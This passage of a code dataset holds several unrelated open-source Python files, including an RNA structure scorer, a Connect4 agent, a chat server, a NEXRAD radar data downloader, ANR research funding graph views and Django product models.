np.array(np.where(self.MEA_bp_matrix == 1)).T:\n if np.abs(i - j) > 1:\n if [j,i] not in self.MEA_bp_list:\n self.MEA_bp_list.append([i,j])\n #self.structure[i] = '('\n #self.structure[j] = ')'\n #print('Warning: formatting pseudoknotted dot-bracket structures not yet supported. Any pseudoknotted stems will only appear as parentheses (not brackets).')\n #self.structure = ''.join(self.structure)\n self.structure = convert_bp_list_to_dotbracket(self.MEA_bp_list,len(self.bpps))\n\n if not self.evaluated: self.evaluated = True\n\n def traceback(self, i, j):\n if j <= i:\n return\n elif self.tb[i,j] == 0: #5' neighbor\n if self.debug: print(i,j, \"5'\")\n self.traceback(i+1,j)\n elif self.tb[i,j] == 1: #3' neighbor\n if self.debug: print(i,j, \"3'\")\n self.traceback(i,j-1)\n elif self.tb[i,j] == 2: # base pair\n if self.debug: print(i,j,'bp')\n self.MEA_bp_list.append((i,j))\n self.traceback(i+1,j-1)\n else: #multiloop\n for k in range(i+1,j):\n if self.W[i,j] == self.W[i, k] + self.W[k+1,j]:\n if self.debug: print(i,j,\"multiloop, k=\",k)\n self.traceback(i,k)\n self.traceback(k+1,j)\n break\n\n def score_expected(self):\n '''Compute expected values of TP, FP, etc from predicted MEA structure.\n\n Returns: \n pseudoexpected SEN, PPV, MCC, F-score'''\n\n if not self.evaluated: \n if run_probknot_heuristic:\n self.run_ProbKnot()\n else:\n self.run_MEA()\n\n pred_m = self.MEA_bp_matrix[np.triu_indices(self.N)]\n probs = self.bpps[np.triu_indices(self.N)]\n\n TP = np.sum(np.multiply(pred_m, probs)) + 1e-6\n TN = 0.5*self.N*self.N-1 - np.sum(pred_m) - np.sum(probs) + TP + 1e-6\n FP = np.sum(np.multiply(pred_m, 1-probs)) + 1e-6\n FN = np.sum(np.multiply(1-pred_m, probs)) + 1e-6\n\n a,b = np.triu_indices(self.N)\n cFP = 1e-6\n # for i in range(len(pred_m)):\n # if np.sum(self.MEA_bp_matrix,axis=0)[a[i]] + np.sum(self.MEA_bp_matrix,axis=0)[b[i]]==0:\n # cFP += np.multiply(pred_m[i], 1-probs[i])\n\n sen = TP/(TP + FN)\n ppv = TP/(TP + FP - cFP)\n mcc = (TP*TN - (FP - cFP)*FN)/np.sqrt((TP + FP - cFP)*(TP + FN)*(TN + FP - cFP)*(TN + FN))\n fscore = 2*TP/(2*TP + FP - cFP + FN)\n\n return [sen, ppv, mcc, fscore]\n\n def score_ground_truth(self, ground_truth_struct, allow_pseudoknots=False):\n if len(ground_truth_struct[0])==1:\n gt_matrix = convert_dotbracket_to_matrix(ground_truth_struct)\n else:\n gt_matrix = ground_truth_struct\n\n if not self.evaluated: self.run_MEA()\n sen, ppv, mcc, fscore, _ = score_ground_truth(self.MEA_bp_matrix, gt_matrix)\n return [sen, ppv, mcc, fscore]\n","repo_name":"DasLab/arnie","sub_path":"src/arnie/mea/mea.py","file_name":"mea.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"5326006806","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom Connect4Game import Connect4Game\n\n\n\nclass SimpleC4AgentTF():\n input_length = Connect4Game.ROW_COUNT * Connect4Game.COLUMN_COUNT\n\n def __init__(self, name):\n self.name = name\n self.inputs = tf.compat.v1.placeholder(shape=[1, self.input_length], dtype=tf.float32)\n # keep_pct is not used in SimpleAgent, but added to ease transition Simple <-> Deep agent\n self.keep_pct = tf.compat.v1.placeholder(shape=None, dtype=tf.float32)\n self.W = tf.Variable(tf.random_uniform([self.input_length, Connect4Game.COLUMN_COUNT], 0.001, 0.01))\n\n self.Qout = tf.matmul(self.inputs, self.W)\n #self.pred_sort = tf.argsort(self.Qout, 1, direction='DESCENDING')\n\n # Below we obtain the loss by taking the sum of squares 
difference between the target and prediction Q values.\n self.nextQ = tf.placeholder(shape=[1, Connect4Game.COLUMN_COUNT], dtype=tf.float32)\n self.loss = tf.reduce_sum(tf.square(self.nextQ - self.Qout))\n self.trainer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.01)\n self.updateModel = self.trainer.minimize(self.loss)\n","repo_name":"Ellebaek/c4champion","sub_path":"SimpleC4AgentTF.py","file_name":"SimpleC4AgentTF.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34706837613","text":"#server_side\r\nimport socket\r\nimport select\r\nimport sys\r\nfrom _thread import *\r\n\r\nfrom tools.server_helper import *\r\nfrom tools.client_helper import getIPaddr\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\nIP_address = getIPaddr()\r\nPort = 8091\r\nserver.bind((IP_address, Port))\r\nserver.listen(100)\r\n \r\nlist_of_clients = []\r\n \r\nwhile True:\r\n conn, addr = server.accept()\r\n list_of_clients.append(conn)\r\n print (addr[0] + \" connected\")\r\n start_new_thread(clientthread,(conn,addr)) \r\n \r\nconn.close()\r\nserver.close()","repo_name":"Z4ck404/INSEA_MATCH","sub_path":"server_side_chat_room.py","file_name":"server_side_chat_room.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"41722309276","text":"from io import BytesIO\nfrom typing import Tuple, Union\nfrom math import ceil\nimport aiohttp\nfrom aiohttp_retry import RetryClient,RetryOptionsBase,ExponentialRetry\nimport pandas as pd\nimport requests\nfrom storms._datasource import _DataSource\nfrom storms.precip.datasets._nexradmaps import n0rMAP, n0qMAP, transformRGB\n\nfrom shapely.geometry import Point\nfrom shapely.ops import transform\nfrom pyproj import Transformer\n\nfrom PIL import Image,UnidentifiedImageError\nimport numpy as np\nfrom storms._utils import datetime_like\n\n\ntoProj = Transformer.from_crs(4326, 3857, always_xy=True).transform\ntoGeo = Transformer.from_crs(3857, 4326, always_xy=True).transform\n\n\ndef get_timezone_info(lat, lon):\n url = \"http://api.geonames.org/timezoneJSON?formatted=true&lat={}&lng={}&username=karosc\".format(\n lat, lon\n )\n r = requests.get(url)\n return r.json()\n\n\nclass NEXRAD(_DataSource):\n def __init__(self, lat: float, lon: float, averaging_distance: float = 500):\n \"\"\"Methods for pulling reflectivity from NOAA's nexrad network.\n\n Parameters\n ----------\n ID: str\n name of nexrad source\n\n Returns\n -------\n\n \"\"\"\n self.ID = \"nexrad\"\n self.lat = lat\n self.lon = lon\n self.bbox = NEXRAD._get_bbox(lat, lon, averaging_distance)\n self.resolution = ceil(averaging_distance / 1000) * 2\n self.bbox_str = \",\".join([str(c) for c in self.bbox])\n tz_info = get_timezone_info(lat, lon)\n self.TZ = tz_info[\"timezoneId\"]\n self.gmt_offset = tz_info[\"gmtOffset\"]\n\n @staticmethod\n def _NORtoDBZ(rgb: np.ndarray) -> np.ndarray:\n \"\"\"\n\n Parameters\n ----------\n rgb: np.ndarray:\n\n\n Returns\n -------\n\n \"\"\"\n transformed = transformRGB(rgb)\n transformed[~np.isnan(transformed).any(axis=1)] = n0rMAP[\n transformed[~np.isnan(transformed).any(axis=1)].astype(int)\n ]\n return transformed\n\n @staticmethod\n def _NOQtoDBZ(rgb: np.ndarray) -> np.ndarray:\n \"\"\"\n\n Parameters\n ----------\n rgb: np.ndarray:\n\n\n Returns\n -------\n\n \"\"\"\n 
transformed = transformRGB(rgb)\n transformed[~np.isnan(transformed).any(axis=1)] = n0qMAP[\n transformed[~np.isnan(transformed).any(axis=1)].astype(int)\n ]\n return transformed\n\n @staticmethod\n def _get_bbox(lat: float, lon: float, buffer: float) -> Tuple[float, ...]:\n \"\"\"\n\n Parameters\n ----------\n lat: float:\n\n lon: float:\n\n buffer: float:\n\n\n Returns\n -------\n\n \"\"\"\n geo = Point(lon, lat)\n proj = transform(toProj, geo)\n bbox = proj.buffer(buffer, cap_style=1)\n bboxGeo = transform(toGeo, bbox)\n return bboxGeo.bounds\n\n # @lru_cache(maxsize=None)\n def request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n aSync: bool = False,\n progress: bool = True,\n **kwargs,\n ) -> pd.DataFrame:\n \"\"\"Request nexrad level III reflectivity data from the Iowa mesonet nor or noq archive:\n https://mesonet.agron.iastate.edu/docs/nexrad_mosaic/\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime\n\n end: datetime_like\n End date string that can be converted to Timestamp with pd.to_datetime\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n aSync: bool\n Switch to pull data asynchronously (can be much faster for longer data pulls), defaults to False.\n\n progress: bool\n Switch to show tqdm bar for data download progress, defaults to True.\n\n **kwargs: dict\n Keyword arguments to pass onto _async_request_dataframe or _sync_request_dataframe.\n\n\n Returns\n -------\n pd.DataFrame\n DataFrame of precipitation records.\n\n \"\"\"\n\n return super().request_dataframe(\n start, end, process_data, aSync, progress, **kwargs\n )\n\n def _request_url(self, start: datetime_like, *args) -> str:\n \"\"\"Get a formatted nexrad request URL for the IOWA mesonet source.\n\n Parameters\n ----------\n start: datetime_like\n date string that can be converted to Timestamp with pd.to_datetime\n\n Returns\n -------\n str\n NEXRAD request url\n\n Raises\n ------\n Exception\n If start date is prior to 1995, no data before then.\n\n \"\"\"\n dt = pd.to_datetime(start) # .tz_localize(self.TZ)\n if dt < pd.Timestamp(\"1/1/1995\"):\n raise Exception(\"No NEXRAD data prior to 1/1/1995\")\n\n UTC = dt - pd.Timedelta(self.gmt_offset, unit=\"H\")\n\n if UTC < pd.Timestamp(\"2011-03-01\"):\n product = \"n0r\"\n else:\n product = \"n0q\"\n\n url = f\"https://mesonet.agron.iastate.edu/cgi-bin/wms/nexrad/{product}-t.cgi?&REQUEST=GetMap&TRANSPARENT=true&FORMAT=image/png&BGCOLOR=0x000000&VERSION=1.1.1&LAYERS=nexrad-{product}-wmst&STYLES=default&CRS=EPSG:4326&SRS=EPSG:4326&TIME={UTC.isoformat()}&BBOX={self.bbox_str}&WIDTH={self.resolution}&HEIGHT={self.resolution}\"\n\n return url\n\n def _sync_request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n pull_freq: str = \"5T\",\n ) -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"Request nexrad data DataFrame with synchronous requests to Iowa Mesonet.\n For potential faster data pulls for longer time periods, use the\n asynchronous request method `_async_request_dataframe`.\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime.\n\n end: datetime_like\n End date string that can be 
converted to Timestamp with pd.to_datetime.\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n pull_freq: str\n Pandas offset string for the length of time for each async data request,\n defaults to every 5-min (the frequency of the mesonet datasource).\n\n Returns\n -------\n pd.DataFrame\n DataFrame of nexrad reflectivity records.\n\n \"\"\"\n data = np.array(self._sync_request_data_series(start, end, pull_freq))\n index = pd.date_range(start, end, freq=pull_freq)\n\n if process_data:\n self._update_progress_description(\"Processing\")\n data = pd.DataFrame(\n self._process_data(data, index), index=index, columns=[\"dbz\"]\n )\n\n self._close_progress()\n\n return data\n\n def _sync_request_data( # type: ignore[override]\n self, start: datetime_like, session: requests.Session, **kwargs\n ) -> np.ndarray:\n \"\"\"Synchronously request nexrad data from Iowa Mesonet\n\n Parameters\n ----------\n start: datetime_like\n Datetime string that can be converted to Timestamp with pd.to_datetime.\n\n session: requests.Session\n requests Session to use for API calls.\n\n Returns\n -------\n list\n return: return array of rgba values for each pixel in the nexrad image\n\n \"\"\"\n url = self._request_url(start)\n try:\n with session.get(url) as response:\n b = BytesIO(response.content)\n img = Image.open(b)\n arr = np.array(img.getdata())\n except UnidentifiedImageError as e:\n print(f'error pulling data for {start.isoformat()}. Filling with nan')\n arr = np.full((self.resolution**2,4),np.nan)\n return arr\n\n # async functions\n async def _async_request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n pull_freq: str = \"5T\",\n conn_limit: int = 30,\n retry_options: RetryOptionsBase = ExponentialRetry(attempts=5, start_timeout=0.1)\n ) -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"\n Request nexrad data DataFrame with asynchronous requests to Iowa Mesonet.\n\n\n Request precipitation DataFrame with asynchronous annual requests to Iowa Mesonet\n\n This is an async function and must be awaited as::\n\n df = await gage._async_request_dataframe(start = '1/1/2020', end = '1/1/2021')\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime\n\n end: datetime_like\n End date string that can be converted to Timestamp with pd.to_datetime\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n pull_freq: str\n Pandas offset string for the length of time for each async data request,\n defaults to every 5-min (the frequency of the mesonet datasource).\n\n conn_limit: int\n Connection limit for aiohttp session, defaults to 30\n\n retry_options: RetryOptionsBase\n Retry options to pass to aiohttp_retry client\n\n Returns\n -------\n pd.DataFrame\n DataFrame of nexrad reflectivity records.\n\n \"\"\"\n\n reqEnd = pd.to_datetime(end) + pd.Timedelta(pull_freq)\n data = np.array(\n await self._async_request_data_series(start, reqEnd, pull_freq, conn_limit, retry_options)\n )\n index = pd.date_range(start, end, 
freq=pull_freq)\n        if process_data:\n            self._update_progress_description(\"Processing\")\n            data = pd.DataFrame(\n                self._process_data(data, index), index=index, columns=[\"dbz\"]\n            )\n\n        self._close_progress()\n\n        return data\n\n    async def _async_request_data(  # type: ignore[override]\n        self,\n        start: datetime_like,\n        session: RetryClient,\n        **kwargs,\n    ) -> np.ndarray:\n        \"\"\"\n        Asynchronously request nexrad data from Iowa Mesonet\n\n\n        Parameters\n        ----------\n        start: datetime_like\n            Datetime string that can be converted to Timestamp with pd.to_datetime.\n\n        session: aiohttp_retry.RetryClient\n            aiohttp_retry RetryClient to use for API calls.\n\n        Returns\n        -------\n        np.ndarray\n            Array of rgba values for each pixel in the nexrad image\n        \"\"\"\n        # start, dummy, session = args\n        url = self._request_url(start)\n        # async json response\n        # https://docs.aiohttp.org/en/stable/client_quickstart.html#json-response-content\n        error_counter = 0\n        for i in range(5):\n            try:\n                async with session.get(url) as response:\n                    b = BytesIO(await response.read())\n                    img = Image.open(b)\n                    arr = np.array(img.getdata())\n\n            except aiohttp.ClientConnectionError:\n                # print(\n                #     \"Oops, the connection was dropped before we finished, retrying...\"\n                # )\n                error_counter += 1\n                continue\n            except UnidentifiedImageError as e:\n                print(f'error pulling data for {start.isoformat()}. Filling with nan')\n                arr = np.full((self.resolution**2,4),np.nan)\n            except Exception as e:\n                print(e)\n                print(f\"error pulling {url}, retrying...\")\n                error_counter += 1\n                continue\n            \n            return arr\n\n\n        raise Exception(f\"error pulling {url} after 5 retries\")\n\n    def _process_data(self, data: np.ndarray, index: np.ndarray) -> np.ndarray:\n        \"\"\"Process raw nexrad rgb values into reflectivity values using NOAA color maps\n        and average values for the entire image.\n\n        Parameters\n        ----------\n        data: np.ndarray\n            Array of rgb values\n\n        index: np.ndarray\n            Array of datetimes for each rgb array\n\n\n        Returns\n        -------\n        pd.DataFrame\n            pandas DataFrame of filtered hourly data\n\n        \"\"\"\n        nor = np.where(index < pd.Timestamp(\"2011-03-01\"))[0]\n        noq = np.where(index >= pd.Timestamp(\"2011-03-01\"))[0]\n\n        norD = NEXRAD._NORtoDBZ(data[nor])\n        noqD = NEXRAD._NOQtoDBZ(data[noq])\n\n        dbz = np.concatenate([norD, noqD], axis=0)\n\n        # zero out negative dbz from n0q\n        dbz[np.where(dbz < 0)] = 0\n        dbz = np.mean(dbz, axis=1)\n\n        return dbz\n","repo_name":"karosc/storms","sub_path":"storms/precip/datasets/_nexrad.py","file_name":"_nexrad.py","file_ext":"py","file_size_in_byte":13509,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
+{"seq_id":"16575898673","text":"import asyncio\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\n\nclass PluralService:\n    def __init__(self):\n        self.base_url = 'https://tools.dehumanizer.com/'\n        self.url = f'{self.base_url}plural/index2.php/'\n        self.arg = 'texto'\n        self.selector = '#main h3 pre'\n        self.words = {}\n\n    async def __get_plural_html(self, word: str):\n        async with aiohttp.ClientSession(self.base_url) as session:\n            async with session.post(self.url, data={self.arg: word}) as response:\n                # await the body while the response is still open\n                return await response.text()\n\n    async def __parse_plural(self, word: str) -> str:\n        html = await self.__get_plural_html(word)\n        soup = BeautifulSoup(html, 'html.parser')\n        plural = soup.select_one(self.selector).text\n        self.words.update({word: plural})\n    \n    def get_plural(self, *words: tuple[str]) -> dict[str, str]:\n        self.words.clear()\n        loop = asyncio.get_event_loop()\n        # gather the bare coroutines; asyncio.create_task() would require an already-running loop\n        coroutines = [self.__parse_plural(word) for word in words]\n        loop.run_until_complete(asyncio.gather(*coroutines))\n        return self.words\n","repo_name":"alexnegrya/E-shop","sub_path":"services/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32969909986","text":"class visitor:\n    # attribute: variable\n    # class var\n    title = \"Ericsson visitor\"\n    name = \"\"\n    phone = \"\"\n    \n    # constructor : function : method\n    def __init__(self, name, phone):\n        self.name = name\n        self.phone = phone\n        print(\"this is visitor class ... testing\")\n    \n    # method: function\n    def get_name(self):\n        print(\"name is : \" , self.name)\n    \n    def send_sms(self):\n        print(\"send sms to: \", self.phone)\n        #print(x)\n\n\n# instantiation\n# jack: object - instance\njack = visitor(\"Jack\", 12345)\n\njack.name\n\njack.send_sms()\n\n\n\n","repo_name":"rasulkarimov/python","sub_path":"python_core_concepts/classes/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15611009121","text":"\nimport pandas as pd\nimport numpy as np\n\n\n# Load data\ndata = pd.read_csv('C:\\\\Users\\\\ritth\\\\code\\\\Strive\\\\Strive-Exercises\\\\Chapter 02\\\\15. TimeSeries\\\\climate.csv')\n# print(data.shape)\n\ndata = data.drop(\"Date Time\", axis = 1)\n#print(data.head())\n\n\n# Function to extract sequences and target variable from given data\ndef pairing(data, seq_len = 10):\n\n    x = []\n    y = []\n    for i in range(0, (data.shape[0] - seq_len + 1), seq_len + 1):\n\n        seq = np.zeros((seq_len, data.shape[1]))\n\n        for j in range(seq_len):\n            seq[j] = data.values[i + j]\n        \n\n        x.append(seq)\n        y.append(data['T (degC)'][i + seq_len])\n\n    return np.array(x), np.array(y)\n\n\npairing(data.head())\n\n# Extract chunks (sequence) of data and the target variable\nx, y = pairing(data)\n\n\nprint(x.shape)\nprint(y.shape)\n","repo_name":"RitthujaKandasamy/Strive-Exercises","sub_path":"Chapter 02/15. 
TimeSeries/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38968548115","text":"# -*- coding:utf-8 -*-\n\nimport ConfigParser\nfrom tulip import *\nimport math\nimport json\nimport pandas as pd\nimport numpy as np\n\n\nclass View(object):\n    \"\"\"docstring for View\"\"\"\n    def __init__(self):\n        super(View, self).__init__()\t\t\n        self.config = ConfigParser.ConfigParser()\n        self.config.read('app/webapp.ini')\n        self.store_path = self.config.get('view', 'store_path')\n\n    def graph2json(self, graph):\n        json_object = {}\n        label = graph['Libellé de partenaire']\n\n        nodes = [] \n        for n in graph.getNodes():\n            node={ 'id': n.id ,'label': label[n],'group':graph['viewMetric'][n]}\n            nodes.append(node)\n        \n        json_object['nodes'] = nodes\n        links = []\n        for e in graph.getEdges():\n            links.append({'from': graph.source(e).id, 'to': graph.target(e).id})\n        json_object['links'] = links\n        \n        with open('static/universities.json', 'w') as fp:\n            json.dump(json_object, fp)\n\n    def graph2json2(self,graph,univ):\n        json_object = {}\n        label = graph['Libellé de partenaire']\n\n        nodes = [] \n        for n in graph.getNodes(): #find the label matching the id univ.\n            if n.id==univ:\n                univlab=label[n]\n                break\n\n        for n in graph.getNodes(): \n            if label[n]==univlab or univlab in graph['Partenaires communs'][n] :\n                node={ 'id': n.id ,'label': label[n]}\n                nodes.append(node)\n        \n        json_object['nodes'] = nodes\n        links = []\n        for e in graph.getEdges():\n            if univlab in graph['Partenaires'][e] :\n                a_ajouter=True\n                for a in links:\n                    if (a['from']==graph.source(e).id and a['to']==graph.target(e).id): #check whether an edge between this source and this target already exists; if so, append the project to its attributes and increment the project count by 1.\n                        a['title']=a['title']+', '+graph['Projet'][e][0]\n                        a['value']=a['value']+1\n                        a['label']=str(a['value'])+' projets'\n                        a_ajouter=False #in that case there is no need to add a new edge\n                        break\n                if (a_ajouter==True): #if no edge exists yet between this source and this target, create one\n                    links.append({'from': graph.source(e).id, 'to': graph.target(e).id,'label' : '1 projet' ,'font': {'align': 'middle'},'value':1,'title': graph['Projet'][e][0] }) \n        json_object['links'] = links \n        with open('static/university.json', 'w') as fp:\n            json.dump(json_object, fp) \n        return univlab\n\n\n    def ville2json(self,ville):\n        data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\",sep=\";\",encoding ='utf-8') \n        year=u'Année de financement'\n        part=u'Libellé de partenaire'\n        projet=u'Acronyme'\n        montant=u'Montant'\n        data=data.loc[:,[projet,year,montant,part]] \n        data.dropna(inplace=True)\n        data = data.reset_index()\n        data = data.drop([\"index\"],axis=1)\n        l=[]\n        for i in range(0,len(data)):\n            if ville not in data.loc[i,part]:\n                l.append(i) \n        data=data.drop(l) #drop every project the city did not take part in\n        data=data.reset_index()\n        data = data.drop([\"index\"],axis=1)\n        df=pd.DataFrame(columns=['Partenaire','Projet','Annee','Montant','id']) \n        line=0\n        for i in range(0,len(data)):\n            part_proj=data.loc[i,part].split(';') #list of all the partners of a project\n            a=0\n            for x in part_proj:\n                if ville in x and x not in part_proj[0:a]: #x not in part_proj[0:a] because some partners appear several times for the same project.\n                    df.loc[line,'Partenaire']=x.replace(',', '')\n                    df.loc[line,'Annee']=data.loc[i,year]\n                    df.loc[line,'Projet']=data.loc[i,projet]\n                    df.loc[line,'Montant']=data.loc[i,montant]\n                    df.loc[line,'id']=line\n                    line+=1\n                a+=1\n        df.to_json('static/city.json',orient='records')\n\n    def generate_graph(self):\n        json_object = {}\n        data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\", sep=\";\")\n        data = data.loc[:,[\"Acronyme\",\"Sigle de partenaire\"]]\n        data = data.dropna()\n        data = data.reset_index()\n        data = data.drop([\"index\"],axis=1)\n        #data contains every project described by the \"acronyme\" and \"sigle de partenaire\" columns\n        #projects with missing values for the acronym or the partner acronym are removed\n        liste = []\n        #liste will hold the partners that share projects with the LaBRI\n        for i in range(0,len(data)):\n            if 'LaBRI' in data.loc[i,\"Sigle de partenaire\"]:\n                for x in data.loc[i,\"Sigle de partenaire\"].split(\";\"):\n                    if x !='':\n                        liste.append(x)\n\n        liste_ = list(set(liste)) #keep only one occurrence of each partner\n        node=[]\n        #node holds all the partners that will be nodes of our graph\n        for j in range(0,len(liste_)):\n            if liste_[j]==\"LaBRI\":\n                node.append({'id':liste_[j], 'label':liste_[j], 'group':0}) #node color differs by group\n            else :\n                node.append({'id':liste_[j], 'label':liste_[j], 'group':liste.count(liste_[j])}) #the group is the number of projects shared with the LaBRI\n\n        json_object['nodes'] = node\n        link=[]\n        #link holds the edges of our graph; value is the edge width, drawn thicker the more projects are shared with the LaBRI\n        for j in range(0,len(liste_)):\n            if liste_[j]!=\"LaBRI\": \n                link.append({'from':\"LaBRI\",'to':liste_[j] , 'value':node[j][\"group\"]*6})\n\n        json_object['links'] = link \n        with open('static/labri.json', 'w') as fp:\n            json.dump(json_object, fp)\n\n    def projet(self,sigle):\n        data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\", sep=\";\",encoding='utf-8')\n        data = data.loc[:,[\"Acronyme\",u'Année de financement',\"Montant\",\"Sigle de partenaire\"]]\n        data = data.dropna(subset=['Acronyme','Sigle de partenaire'])\n        data = data.reset_index()\n        data = data.drop([\"index\"],axis=1)\n        data=data.fillna(0)\n        #Data contains every project described by the \"acronyme\", \"année de financement\", \"montant\" and \"sigle de partenaire\" columns\n        #Projects with missing values for the acronym or the partner acronym are removed (because the selection for the previous graph (generate_graph()) only uses\n        #those two columns; if we also dropped the rows with missing funding year or amount, projects counted earlier would be removed\n        #and fewer projects would be displayed than expected (e.g. by the color on the LaBRI graph)\n        #So missing values for the funding year or the amount are replaced by 0\n        \n        liste = []\n        #liste will hold every project having both the LaBRI and \"sigle\" (the partner that was clicked) among its partner acronyms.\n        for i in range(0,len(data)):\n            if sigle in data.loc[i,\"Sigle de partenaire\"] and 'LaBRI' in data.loc[i,\"Sigle de partenaire\"] :\n                liste.append(i)\n        \n\n        proj = pd.DataFrame(index = range(0,len(liste)), columns = [\"Acronyme\",\"Annee\",\"Montant\",\"Partenaire\" ])\n        #proj holds the projects shared by the LaBRI and the chosen partner, described by the acronym, funding year, amount and the other partners\n        for j in range(0,len(liste)):\n            proj.loc[j, \"Acronyme\"] = data.loc[liste[j],u\"Acronyme\"]\n            proj.loc[j,\"Partenaire\"] = data.loc[liste[j],\"Sigle de partenaire\"]\n            proj.loc[j, \"Annee\"] = data.loc[liste[j],u\"Année de financement\"]\n            proj.loc[j,\"Montant\"] = data.loc[liste[j],\"Montant\"]\n        \n\n        proj.to_csv('static/projects_part_labri.csv', sep=\",\", encoding='utf-8', index=False)\n\n    \n\n    \n","repo_name":"estellepreuilh/projet_ANR","sub_path":"ANR/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"10085563687","text":"import torch\nimport numpy as np\nimport horovod.torch as hvd\n\n\nclass Meter(object):\n    def __init__(self, pp_pr, pp_gt):\n        self.n_tracked = None\n        self.loss = None\n        self.avg_loss = None\n        # main metric is Top1 error\n        self.topk = (1, 5)\n        self.correct = None\n        self.avg_error = None\n        self.avg_metric = None\n        self.start_metric = torch.tensor(100.)\n\n        self.pp_pr = pp_pr\n        self.pp_gt = pp_gt\n        self.reset()\n\n    def reset(self):\n        self.n_tracked = torch.tensor(0)\n        self.loss = torch.tensor(0.)\n        self.avg_loss = torch.tensor(0.)\n        self.correct = torch.zeros(len(self.topk))\n        self.avg_error = self.start_metric.repeat(len(self.topk))\n\n    def update(self, pr_outs, gt_labels, loss):\n        pr_labels = self.pp_pr(pr_outs)\n        gt_labels = self.pp_gt(gt_labels)\n        assert len(pr_labels) == len(gt_labels), 'Number of predictions does not match number of ground truths!'\n        bs = torch.tensor(len(gt_labels))\n        self.n_tracked += hvd.allreduce(bs, name='batch_size', average=False)\n        # update loss\n        self.loss += hvd.allreduce(loss.item() * bs, name='loss', average=False) # loss should be unlinked from computational graph\n        self.avg_loss = self.loss / self.n_tracked\n        # update main metric\n        correct = torch.zeros(len(self.topk))\n        for i in range(bs):\n            for j, k in enumerate(self.topk):\n                correct[j] += gt_labels[i] in pr_labels[i][0:k]\n        self.correct += hvd.allreduce(correct, name='metric', average=False)\n        self.avg_error = 100. * (1. 
- np.true_divide(self.correct, self.n_tracked)) # cast to avoid integer division\n self.avg_metric = self.avg_error[0] # main metric is Top1 error\n\n def is_better(self, current_metric, best_metric):\n # compare Top1 errors\n return current_metric < best_metric\n","repo_name":"sbenslan/sem21f23","sub_path":"problems/ImageNet/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"331125944","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n\nclass Category(MPTTModel):\n name = models.CharField(max_length=50)\n parent = TreeForeignKey(\n \"self\",\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n )\n\n # verbose_name/verbose_name_plural are standard Django Meta options\n class Meta:\n verbose_name = _(\"category\")\n verbose_name_plural = _(\"categories\")\n\n def __str__(self):\n return f'{self.name} | parent - {self.parent}' if self.parent else self.name\n\n @classmethod\n def get_default_pk(cls):\n obj, created = cls.objects.get_or_create(name=\"No category\")\n return obj.pk\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=200)\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_DEFAULT,\n default=Category.get_default_pk,\n )\n price = models.DecimalField(max_digits=7, decimal_places=2)\n quantity = models.PositiveSmallIntegerField(default=0)\n\n class Meta:\n verbose_name = _(\"product\")\n verbose_name_plural = _(\"products\")\n\n def __str__(self):\n return f'{self.name} price - ({self.price} quantity - {self.quantity} description - {self.description})'\n","repo_name":"Dmitry979/chinese-auto-django-mptt","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
